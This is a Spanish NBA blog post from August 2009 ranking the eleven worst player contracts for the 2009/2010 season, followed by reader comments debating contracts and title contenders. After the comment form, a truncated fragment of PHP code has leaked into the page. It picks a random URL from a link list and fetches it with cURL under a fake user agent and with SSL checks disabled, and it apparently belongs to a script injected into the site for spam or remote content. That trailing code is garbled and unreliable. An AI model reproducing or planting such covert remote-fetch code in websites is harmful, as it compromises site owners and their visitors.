Los 11 peores contratos de la temporada 2009/2010

12 de August de 2009 por txusma

Seguro que todo GM, cuando presenta una oferta a un jugador, piensa que realmente es una buena idea. Posiblemente sea la pieza que falta para asaltar el anillo o dar el salto de calidad definitivo para convertirse en equipo de Playoffs y seguir creciendo. Pero también saben que la mala suerte acecha a cada segundo y lo que parecía una gran inversión el primer día puede convertirse en toda una pesadilla economica. Y más en los tiempos que corren. Vamos a dar un repaso a los peores contratos que estarán en vigor en la temporada 2009-2010 empezando por los menos malos:

11.- Pedja Stojakovic: Un claro ejemplo de que la edad no perdona y de que hay que ir con pies de plomo a la hora de ofrecer grandes contratos a jugadores de casi 30 años. Pocos olvidaremos el juego de Stojakovic cuando militaba en los Kings y era capaz de promediar 24 puntos por partido. Deslumbrados por ese recuerdo y con la necesidad de rodear a Chris Paul de un gran equipo los Hornets le ofrecieron un contrato de 64 millones de dólares y 5 años de duración. Ahora, el talento y la calidad del serbio aparecen con cuentagotas por culpa de las continuas lesiones de espalda que padece y lo más seguro es que las 2 temporadas que le quedan en la franquicia de Luisiana las pase entre algodones y dosificando sus minutos de juego. Difícil que New Orleans pueda amortizar los casi 30 millones que ha de cobrar todavía.

10.- Andrei Kirilenko: Durante la temporada 2004-2005 los Jazz extendieron el contrato del ruso ofreciéndole unos 14 millones de dólares por cada una de las 6 temporadas definidas en el acuerdo. Aquel año se ganó cada uno de los millones que firmó. Y también el siguiente. Pero en la temporada 2006-2007 tuvo lugar uno de esos expedientes X imposibles de explicar. Kirilenko promedió 7 puntos y 3 rebotes menos que el año anterior y aún peor, mostraba una pasividad y una indolencia impropía de un super-crack. Posiblemente no fue capaz de adaptarse al rol de sexto hombre o cuarto espada que Sloan había preparado para él. La cuestión es que desde ese año no ha levantado cabeza, al menos al nivel que se le presupone y cada vez que recordamos lo que cobra y lo que le queda por cobrar (32 millones en total) nos llevamos las manos a la cabeza.

9.- Rashard Lewis: Puede parecer extraño que un super clase como el alero de los Magic aparezca en esta lista pero es que su contrato es mastondóntico, propio de otros tiempos. Atentos: este año cobrará 18.9 millones de dólares y aún le quedan otro 3 años más, para hacer un total de aproximadamente 83 millones. ¿Creeís realmente que Rashard se merece toda esta morterada de billetes? ¿Es realmente tan decisivo como para cobrar hasta el último centavo de su contrato? Para empeorar las cosas la sanción de 10 partidos que le ha caído por consumo de anabolizantes no ayudará en la valoración de su contrato.

8.- Kenyon Martin: En el verano de 2004, y tras completar su mejor temporada, el número 1 del draft del 2000 (¿el peor de la década?) fue traspasado a los Nuggets mediante un sign-and-trade a cambio de 3 primeras rondas. Repasando cuáles fueron esas elecciones (Joey Graham, Rolando Blackman y Marcus Williams) cierto es que los Nets no ganaron mucho pero Kenyon nunca volvió al nivel que mostró en esa temporada. El jugar lejos de Jason Kidd y sobretodo las lesiones que sufrió hicieron que actualmente, aunque aporte en varias facetas del juego, no se merezca los casi 32 millones de dólares que ha de cobrar en las próximas 2 temporadas.

7.- Jared Jeffries: Tener en plantilla un escolta/alero de casi 7 pies mola y eso, claro está, hay que pagarlo. Los Knicks lo hicieron en el verano de 2006 y le ofrecieron más de 24 millones de dólares durante 4 años, dólares que nunca ha llegado a ganarse del todo. Ahora, cobrando casi 6.5 millones y con otro año más de contrato, no tiene sitio en New York. ¿A alguien le sorprende?

6.- Marco Jaric: El marido de Adriana Lima siempre le agradecerá a Kevin McHale los casi 32 millones que le firmó por 5 años de servicio. Sus número desde aquel día siempre nos dejan la duda si le firmó el contrato para tenerle en su equipo o para poder ver en las gradas del Target Center a la bella modelo brasileña. Ahora le sufren en Memphis, encargados de pagarle los 13 kilos que aún ha de cobrar. Al menos no le faltará de nada al hijo que esperan. ¡Felicidades!

5.- Nazr Mohameed: En verano de 2006, unos Pistons huérfanos de pívot tras la marcha de Ben Wallace le ofrecieron 30 millones de dólares por 5 años de contrato. En aquel momento no parecía mala idea y muchos opinaban que el pívot de Chicago era ideal para cubrir el hueco dejado por “Big Ben”. Pero la llegada de Chris Webber truncó sus sueños y abandonó la franquicia rumbo Charlotte a la temporada siguiente. Los 13.4 millones que aún le quedan por cobrar seguro que duelen a más de un miembro de la directiva de los Bobcats y más sabiendo que Mohameed pisará poquito las canchas de juego, ya que ha de repartirse los minutos con Tyson Chandler y DeSagana Diop.

4.- Eric Dampier: El miembro de honor del club del “Cazo Mix”, esos jugadores que en último año de contrato se dejan los higadillos en el campo y juegan como nunca para ganarse el sustento de los años siguientes. Dampier es el ejemplo de cómo llevar a cabo este maravilloso plan. En la temporada 2003-2004 se acababa su contrato con los GSW y sus números crecieron espectacularmente: 12 puntos y 12 rebotes en 32 minutos de juego. Los Mavs picaron el anzuelo y le firmaron un mega contrato de 73 millones de dólares y 7 años de contrato. No está mal para un jugador de 29 años. Ahora, 5 años después, Dampier tiene 34, promedia 5.7 puntos y 4.4 rebotes, ve como le quedan por cobrar aún 23 millones por este año y otro más y disfruta de la vida como nunca. ¡Ídolo!

3.- Marcin Gortat: Está clarísimo que el pívot polaco no jugará nunca más de 15 minutos por partido si Dwight Howard está mínimamente sano. Teniendo esto claro, ¿qué es lo que te empuja a igualar una oferta de más de 30 millones de dólares durante 5 años? Cuando los Mavs presentaron la oferta, la mayoría nos echamos las manos a la cabeza. Cuando los Magic la igualaron, los ojos se nos salieron de las órbitas. Vale que Gortat es un jugador todo intensidad mientras está sobre el campo, ¿pero seguro que no eres capaz de encontrar algo parecido mucho más barato?

2.- DeSagana Diop: ¿Puede un jugador que nunca ha superado los 3 puntos por partido cobrar más de 6 millones por temporada? Pues sí y el pívot de origen senegalés de los Bobcats es buena prueba de ello. Su fenomenal contrato finaliza en la temporada 2012/2013 (en la que tiene una Player Option) y gracias a él cobrará más de 26.5 millones de dólares. Se lo ha de agradecer a los Dallas Mavericks que le firmaron ese contrato el verano pasado pero que se arrepintieron rápido, traspasándolo a Charlotte 6 meses después. En la franquicia de Carolina del Norte ha jugado 41 partidos, anotando un total de 114 puntos. Mejor no calcular a cuánto les sale el punto.

1.- Eddie Curry: Seguro que no sorprendemos a nadie otorgando el título de peor contrato de la NBA a Eddie Curry y es que los 11 millones de dólares que cobrará por cada una de las 2 temporadas de contrato que le quedan deben doler a más de uno en New York. Chicago le renovó en el 2005 pero rápido enmendó su error y lo envió con un lacito a la Gran Manzana. Allí cuajo dos buenas temporadas antes de hundirse definitivamente hasta el punto de jugar sólo 4 partidos el año pasado. Ahora amenaza con volver pero no nos lo imaginamos ganándose cada uno de los dólares que cobra.

Menciones de honor para: Andres Nocioni, Dan Gadzuric y Marcus Banks. Y no les quitéis un ojo los próximos años a los contratos de Andrea Bargnani, Elton Brand, Chris Kaman, Luol Deng, Corey Maggette o Gilbert Arenas.

Comenta

19 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Me duele mucho, muchísimo decirlo, pero McGrady y su megacontrato deberían estar aquí debido a su continuo historial de lesiones.
    Está cobrando 23 millones (Hoy por hoy el contrato más alto de la NBA) por jugar 35 partidos requeante cada temporada.
    El de Jermaine con 22 millones tampoco está mal.

    Dices el draft del 2000 como el peor de la década, yo iría más allá, el peor de la historia, el nivel de aquella hornada (excepto Reed) es ínfimo, recuerdo que hasta perdieron e partido siendo sophomores contra los rookies en su segundo año. En un partido en el que creo recordar estaba gente como Khalid El Amin y algun undrafted como Marc Jackson…. lamentabe hornada.

      Citar

  2. rojorob dice:
    #2

    Me parece un poco injusto el comentario de DeSagana Diop, ya que no sólo ha aportado 114 puntos, también 12 o 13 rebotes y 4 o 5 tapones.

      Citar

  3. Froster dice:
    #3

    Diop es un jugador claramente defensivo. Está claro que su aportación en puntos es bastante pésima, pero me parece mucho peor lo de Dampier por ejemplo.

    Y no estoy para nada de acuerdo con lo de Rashad. Si Orlando ha estado en la final ante los Lakers, uno de los hombres decisivos ha sido él. Sin Howard no hubieran estado, pero si Rashad no les hubiera ido tan fácil, seguro.

      Citar

  4. pcerezo dice:
    #4

    That’s entertaiment….

    Veo que hay gente que no dencasa ni en agosto…
    Aquí estamos al pié del cañón…

    Mcgrady mientras estuvo medio sano promedió 20 puntos por partido.
    El contrato de Jermaine O’neal es tremendo y el de Shaquille O’neal ni te cuento. 25 millones para lo que ya ofrece es tremendo. No puede jugar un back to back y no hace dos partidos bueno seguidos. Demasíado pastizal para el “Perro Grande”.

    Txusma estoy contigo en cuanto al contrato firmado a Mr. Bargnani. Me da a mi que va a ser una bacalá tremenda y otro gran error de Mr. Colangelo sin rumbo desde hace varios años.

    Los 20 kilos que cobró Marbury tampoco nos los podemos perder de vista. Vaya negocio el de los Knicks.

    El de Ben Wallace también tremendo. No sé exactamente pero creo que eran uns 15kilos por dos puntos y 5 rebotes.

    Un saludo,
    Pablo

    P.D.:

      Citar

  5. Dantley2 dice:
    #5

    Hynreck, no es un ranking de gente que no se merezca ganar ese dinero, sino de malos contratos. Los expirings a día de hoy no son malos, son enormes oportunidades de que un equipo desesperado por quitarse salario para la temporada siguiente te meta en el trade a gente interesante.

    Así que los 23 de McGrady no tienen ese punto malo de los contratos basura a los que les quedan hasta 4 años o incluso más. Igual pasa con Jermaine o con Marbury. Son contratos lejísimos de lo que aportan, pero son expirings. El mágico mundo de los expirings, del que hablaremos si nos da tiempo en septiembre.

    Rojorob, Diop este año en Charlotte ha promediado 2.8 puntos, 3.8 rebotes, 0.8 tapones. Aunque igual lo dices en tono irónico ahora que me doy cuenta ¡¡¡

      Citar

  6. Óscar dice:
    #6

    Poco que decir de la lista. merecidísimo el #1 de Eddie Curry… Me parece que dentro de unos años, los fiascos de este tipo (los habrá) no serán tan escandalosos, por aquello de la crisis y de la reducción del salary cap. Algunos casos son bochornosos…

      Citar

  7. Óscar dice:
    #7

    P.D. En la página “hispanosnba” podemos ver los salarios de cada equipo, casi siempre actualizados además, y para los próximos años también. Siempre se encuentran sorpresas, como que Roy ha sido hasta ahora el 9º mejor pagado de Portland, por detrás de joyas como LaFrentz (12,7 mill. $, podría incluirse en la lista), Przybilla, Blake o Frye, por no hablar de los 9 millones que cobrará este año también Darius Miles que al final cuentan para el límite salarial de este año tras jugar unos partiditos con Memphis, que ya le han cortado… En fin.

      Citar

  8. uymeloolvide dice:
    #8

    Lo de Diop y Curry es tremendo xD

    Te cuento que hace poco los usuarios de un foro empezamos un nuevo proyecto en el que hablamos puramente de NBA. El blog empezo hace poco, y todavía no tenemos muchos visitantes, pero queremos que esto crezca y tratamos de actualizar diariamente con todas las noticias ynovedades de la mejor liga.
    Te propongo algo: tu nos pones en la lista de blogs en el tuyo.. con el nombre Jugones NBA… y nosotros tambien hacemos un enlace en nuestro blogroll. Lo mismo para cualquier persona que tenga un blog y que esté leyendo. Si les interesa la propuesta, solo comentalo en alguna noticia, e inmediatamente hacemos el link… el link del blog es http://www.jugonesnba.blogspot.com

    Saludos… por favor responde en nuestro blog..

      Citar

  9. Hakeem dice:
    #9

    Yo añadiría que cuidadito con Andrew Bynum,con 15 millonazos en el 2011/2012 y una capacidad para lesionarse común a otros 7 pies…
    Además,la millonada de Kidd en Dallas escuece cuando ves su bajón de rendimiento y su edad,y que Sessions por ejemplo no cobrará mucho mas de la mitad que el…
    Rashard Lewis terminará siendo un estorbo,ahora están los millones medio justificados,pero sobrán dos años de contrato xD
    Troy Murphy y Dunleavy también fueron casos gordos…

      Citar

  10. Txusma dice:
    #10

    Lo de Murphy creo q fueron unos 50 kilos por 5 años pero se lo firmaron a un jugador q venia de promediar durante 2 años seguidos más de 14 puntos y 10 rebotes por partido y q en su segundo año tb superó la decena de rechaces. Además esta temporada pasada no lo ha hecho nada mal (14-10).
    Pablo, el contrato de Bargnani puede resultar un error tremendo en un año o dos pero ojito con el de Gilbert Arenas. Sano, posiblemente se habria ganado cada uno de los 94 millones que le quedan por cobrar hasta la 2013/2014, pero es que en las dos ultimas temporadas solo ha jugado 15 partidos… Tiemblan los Wizards

      Citar

  11. pcerezo dice:
    #11

    Yo creo que la lesiones son un eximente porque está claro que Arenas ha jugado poquísimo para el contrato que tiene pero cuando ha jugado ha sido con muy buenos números. Estoy contigo que “Cortefiel” debe estar rezando para que este sano todo el año porque no han fichado mal los Wizards. De todas formas si analizas el dinero que se mueve en el deporte es tremendo. A Arenas le quedan por cobrar 94millones de dólares y ya es multimillonario. No me extraña que se vuelvan locos y comentan tantas locuras fuera de la cancha.
    Los peores casos yo creo son los que estando sanos su rendimiento no se corresponde con el contrato que firman.
    Murphy tal vez tenga un contrato alto pero es que los pivots de calidad escasean y este Murphy no lo está haciendo del todo mal tiene mejores números que Bynum por ejemplo. Es una pena ver a Indiana en las condiciones que está. Un equipo de play off y luchador y no levanta cabeza. Su andadura por el desierto va a ser muy larga.
    Lo de Bargnani es que no lo veo. Sigo sin comprender como le han firmado ese contrato y como lastran la plantilla de esa manera. Colangello ha cometido dos errores (como la película), escoger al jugador equivocado y firmarle un pastizal.
    Si no hay algún trade entre grandes estrellas en lo que queda de verano tengo claro que el campeón sale de Lakers o Spurs. No veo a nadie que sea capaz de hacerles cara. Los Lakers porque tienen una gran plantilla y los Spurs porque con los movimientos que han hecho han mejorado enormemente su plantilla. Qué opináis?

    Un saludo,
    Pablo

      Citar

  12. Txusma dice:
    #12

    Y ya dejas fuera a los Cavs?
    Durante el mes de septiembre-octubre empezaremos a analizar las diferentes plantillas (q por cierto, si a alguien le hace ilusion alguna solo ha de decirlo. Esto es un blog, antetodo, participativo) pero ahora mismo me cuesta darles un escalon por debajo de Lakers y Spurs. Lebron, O’Neal, M.Williams, Ilgauskas, Varejao, Parker, Powe, West, Moon… No suena tampoco mal la cosa.

      Citar

  13. pcerezo dice:
    #13

    Lo de los Cavs no lo veo. Puede que me equivoque pero lo de O’neal no lo tengo nada claro. Ilgauskas va para abajo, Parker tiene 34 tacos y lleva dos años sin hacer nada, Jamaree Moon no está para estas cosas…
    Sinceramente comparar un equipo donde tienes a Kobe, Gasol, Bynum, Odom, Artest o Duncan, Parker, Jefferson, Ginobili, Mcdyess..o incluso la plantilla que tiene Denver.

    Si tengo tiempo a ver si puedo escribir algo y ya os lo mando.

    Un saludo,
    Pablo

      Citar

  14. Óscar dice:
    #14

    A día de hoy todo está por ver. Sobre Cleveland ya hablé en “mucha tela que cortar”, demasiados cambios para la temporada que hicieron, cambiando todo de golpe. En los foros americanos se habla por supuesto de LAL, de CLE, mucho de SAS y sus fichajes, de los finalistas Magic, y poco de Portland (mejor para no crear falsas expectativas ni meter presión adicional a un equipo tan joven) y sorprendentemente, poco también de Boston, al menos como favorito.
    El fichaje de Rasheed Wallace debería ser una razón de peso para contar con los Celtics como auténticos aspirantes al anillo, que lograron en 2008. Con jugadores más hechos como Rondo, Perkins o Davis, más la continuidad del “Big 3”, la llegada de “Sheed” no parece que haya encandilado a analistas ni aficionados, ni siquiera en Massachusetts. La respuesta tal vez la encontremos en el perfil humano del propio personaje, tan querido por los suyos como odiado por los rivales, desde sus años en North Carolina o en su desembarco en la NBA con Washington y luego los Blazers.
    Aunque analizándolo friamente, la verdadera respuesta pueden ser los 35 años que va a cumplir Wallace, que son bastantes, pese al distinto concepto que tienen los americanos respecto a la edad de los deportistas. Y son bastantes porque los otros jugadores que llevarán el peso del equipo también están ya en plena treintena, incluído Pierce, que cumplirá 32 en Octubre.
    Si Boston tiene suerte con las lesiones (la que no tuvo en 08/09 en el momento decisivo con las bajas de Garnett y Powe), yo no les descartaría en absoluto. Un quinteto con Rondo-R.Allen-Pierce-Garnett-R.Wallace no es nada desdeñable, pese a los años. Y una rotación con Bill Walker (cuidado que puede explotar), T.Allen, Scalabrine, Davis o Perkins tampoco está mal, aunque es probable que hagan más movimientos para compensar la plantilla y reforzar los puestos de “backup” de Rondo y Pierce. La baja de Powe sería importante si estuviese bien físicamente, cosa que no es así.

      Citar

  15. pcerezo dice:
    #15

    No tengo claro lo de los Celtics. Un año más viejos y no tienen tanta calidad como Lakers o Spurs. Además pueden haber perdido hambre. Veremos como aguantan toda la temporada, debe ser la plantilla con el quinteto titular más viejo.

    Óscar, está claro que de Blazers no hablan porque creo que no son favoritos ni a final de conferencia (desde mi punto de vista). Por delante están Lakers, Spurs y Denver. Están al mismo nivel que Rockets, Dallas. Los Blazers para llegar muy lejos deben encomendarse a un supermejora de las prestaciones de Oden.

    NOTICIA: Chocolate Blanco vuelve a la liga. A Orlando. Aún recuerdo esa frase de Daimiel: “Por eso Jason Williams debe existir…”.

    Un saludo,
    Pablo

      Citar

  16. Txusma dice:
    #16

    A los Rockets no les veo ni en Playoffs. Con los problemas fisicos de T-Mac y la baja de Yao para toda la temporada ya veremos el papel que hacen.

      Citar

  17. Kiki dice:
    #17

    PCerezo, si tu argumento para no contar con los Celtics es el de la edad, por la misma razón deberíamos descartar a San Antonio. Han fichado como refuerzos interiores clave a McDyess (35) y Ratliff (36), que no son unos críos. Jefferson (29) y Haislip (29) sí bajan algo la media de edad, sobre todo por la marcha de Bruce Bowen (volverá?), Oberto o Kurt Thomas, pero si hacemos la media deben estar muy igualados con los Celtics. Yo no veo un problema la edad en sí misma, siempre que los jugadores se cuiden y no tengan problemas físicos importantes. El “big three” de los Spurs sí es algo más joven, pero Duncan tiene 33 y Manu, 32 años. Atención al rookie DeJuan Blair, elegido en 2ª ronda y que puede ser el mejor de los debutantes que no han estado entre los primeros. Le he visto varios partidos con Pittsburgh junto a Sam Young (MEM) y aunque justito llega a los dos metros, es un jugador interior brutal, muy fuerte e inteligente en el rebote. Yo le esperaba en los 15 primeros puestos sin duda. A lo mejor me equivoco, pero utiliza el cuerpo como nadie, es una roca. Lo que no me extraña es que lo hayan elegido los Spurs.
    Increíble lo de Quentin Richardson: cuatro equipos en un solo verano: de NYK a MIA, “pasando” por MEM y LAC. En unas declaraciones, hasta se olvida de alguno de esos equipos repasando su historia… Y “chocolate blanco”, al final ni a Memphis ni a New York, sino también a los Heat, que sólo contaban con Chalmers y el rookie Beverley como bases puros. Un jugador distinto.
    En cuanto a lo que decís de Portland, no hay que subestimarlos dada la temporada que hicieron el año pasado. Si Aldridge acompaña a Roy en el All-Star (potencial le sobra), Miller hace lo que sabe y jugadores como Webster y Oden explotan definitivamente, es un equipo muy a tener en cuenta y con mucho más futuro que el resto de equipos fuertes en este momento. El banquillo puede ser brutal: Blake, Bayless, Rudy, Batum, Outlaw, el rookie Cunningham (un “4” muy físico y completo) y Przybilla. Una plantilla muy joven y compensada, con buenos anotadores, defensores, especialistas, tiradores, etc. … y un año más de experiencia.

      Citar

  18. Kiki dice:
    #18

    Perdón, Jason Williams va a Orlando, no a Miami. Pues como no fichen a alguien o renueven a Luther Head o Chris Quinn (ni aparece en la lista de movimientos de MIami), me da que a Wade le va a tocar jugar de “uno” mucho más que el año pasado… Es capaz de todo y de más, pero está por ver cómo le acompaña el equipo, de hecho ha dicho que lo que más le importa es tener una plantilla fuerte o si no pensará en irse…

      Citar

  19. César dice:
    #19

    Si discutimos la necesidad de tanto cambio en los Cavaliers, atención a los movimientos de Toronto, mucho más justificado tras las 33 victorias del año pasado (lo he copiado de marca.com/nba). Sólo siguen Calde, Bargnani y Bosh, al menos por ahora:
    *Toronto Raptors 2009/2010
    Los que siguen: Chris Bosh, José Manuel Calderón, Andrea Bargnani
    Los que han llegado: Hedo Turkoglu, Reggie Evans, Jarrett Jack, Amir Johnson, DeMar DeRozan, Antoine Wright, Marco Belinelli, Rasho Nesterovic, Sonny Weems
    Los que se han ido: Anthony Parker, Jake Voskuhl, Shawn Marion, Nathan Jawai, Kris Humphries, Jason Kapono, Devean George (vino y se fue este verano), Roko Leni Ukic.
    En el aire: Pops Mensah Bonsu, Patrick O´Bryant, Quincy Douby, Marcus Banks.

    Si lo piensas, parece que han mejorado mucho, pero las incorporaciones estarían bien si complementasen a un núcleo duro más amplio, más potente. Turkoglu por sí solo no creo que transforme tanto a los Raptors como pretenden. Al menos en profundidad de plantilla sí han mejorado mucho, cosa nada complicada tras los movimientos de Colangelo el verano pasado, que conformó un equipo con la rotación quizás más corta de la Liga
    No sé lo veis como yo, pero me parece que le harían falta un par de retoques más para ser un equipo que no sólo aspirase a meterse en playoffs, tras el fiasco de la campaña anterior. Y ni siquiera estaría yo tan seguro de eso si no logran algo más. Nunca se sabe…
    Saludos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>